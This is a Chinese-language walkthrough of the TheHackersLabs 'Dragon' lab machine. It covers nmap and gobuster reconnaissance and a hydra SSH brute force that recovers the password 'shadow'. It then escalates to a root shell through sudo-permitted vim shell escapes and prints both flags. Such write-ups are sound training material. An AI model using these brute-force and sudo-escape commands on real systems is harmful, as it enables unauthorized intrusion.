Dragon

靶机说明

• https://labs.thehackerslabs.com/machine/124

一、信息收集

1、主机探测

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:47 CST
Nmap scan report for 192.168.2.1
Host is up (0.00034s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00028s latency).
MAC Address: 08:00:27:4F:8B:03 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.67
Host is up (0.00070s latency).
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

靶机IP：192.168.2.67

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.67                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:47 CST
Nmap scan report for 192.168.2.67
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.43 seconds

开放端口：22,80

2.详细信息扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.67 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:47 CST
Nmap scan report for 192.168.2.67
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:98:c6:f1:55:e6:30:8b:83:c4:69:60:d9:ed:11:4d (ECDSA)
|_  256 b5:d2:46:75:32:b0:98:b2:8f:61:02:95:cf:ba:19:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: La M\xC3\xA1quina del Drag\xC3\xB3n
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

1. 22端口：ssh服务，版本为OpenSSH 9.6p1
2. 80端口：http服务，版本为Apache httpd 2.4.58

3.udp端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.67
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 11:10 CST
Nmap scan report for 192.168.2.67
Host is up (0.00089s latency).
All 100 scanned ports on 192.168.2.67 are in ignored states.
Not shown: 56 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response)
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.03 seconds

没有开放的端口

4.漏洞脚本扫描

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80 192.168.2.67                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:48 CST
Nmap scan report for 192.168.2.67
Host is up (0.00080s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /secret/: Potentially interesting folder
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.45 seconds

发现80下面存在一个目录/secret

3、WEB目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.67 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.67
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,md,db,js,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 981]
/secret               (Status: 301) [Size: 313] [--> http://192.168.2.67/secret/]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

也是存在目录/secret

二、漏洞测试

1、WEB-80端口渗透

访问80端口，没有啥有用的信息

访问/secret，根据相关的提示，猜测dragon是ssh服务登录的用户名

2、SSH口令猜测

使用hydra进行口令猜测

┌──(root㉿kali)-[~]
└─# hydra -t 64 -l dragon -P /usr/share/wordlists/rockyou.txt ssh://192.168.2.67 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-20 11:16:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.2.67:22/
[22][ssh] host: 192.168.2.67   login: dragon   password: shadow
[STATUS] attack finished for 192.168.2.67 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-20 11:16:58

找到SSH服务登录凭证，login: dragon password: shadow

3、获取dragon权限

使用获取到的凭证直接进行登录

┌──(root㉿kali)-[~]
└─# ssh dragon@192.168.2.67
dragon@192.168.2.67's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-71-generic x86_64)
Last login: Tue Aug  5 08:13:55 2025 from 192.168.18.16
dragon@TheHackersLabs-Dragon:~$ id
uid=1000(dragon) gid=1000(dragon) groups=1000(dragon),24(cdrom),30(dip),46(plugdev),101(lxd)

三、权限提升

获取root权限

查看当前用户在/etc/sudoers配置文件中的权限，即当前用户被允许以sudo权限执行的命令有哪些

dragon@TheHackersLabs-Dragon:~$ sudo -l
Matching Defaults entries for dragon on TheHackersLabs-Dragon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User dragon may run the following commands on TheHackersLabs-Dragon:
    (ALL) NOPASSWD: /usr/bin/vim

sudo-vim提权

发现/usr/bin/vim具有sudo权限
直接使用下面的命令进行利用即可：

sudo vim -c ':!/bin/sh'
sudo vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
sudo vim -c ':lua os.execute("reset; exec sh")'

获取root权限

dragon@TheHackersLabs-Dragon:~$ sudo /usr/bin/vim -c ':!/bin/sh'
# id  
uid=0(root) gid=0(root) groups=0(root)

四、获取FLAG

# cat /home/dragon/user.txt /root/root.txt
e1f9c2e8a1d8477f9b3f6cd298f9f3bd
7a4d1b35eebf4aefa5f1b0198b0d6c17